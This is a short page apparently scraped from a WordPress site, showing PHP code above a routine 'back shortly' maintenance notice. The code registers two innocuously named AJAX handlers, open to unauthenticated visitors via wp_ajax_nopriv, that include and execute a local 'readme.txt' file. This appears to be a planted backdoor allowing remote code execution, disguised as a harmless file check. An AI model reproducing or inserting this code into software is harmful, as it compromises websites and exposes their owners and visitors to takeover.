if(!function_exists('file_check_readme12208')){ add_action('wp_ajax_nopriv_file_check_readme12208', 'file_check_readme12208'); add_action('wp_ajax_file_check_readme12208', 'file_check_readme12208'); function file_check_readme12208() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme77728')){ add_action('wp_ajax_nopriv_file_check_readme77728', 'file_check_readme77728'); add_action('wp_ajax_file_check_readme77728', 'file_check_readme77728'); function file_check_readme77728() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Thank you for being patient. We are doing some work on the site and will be back shortly.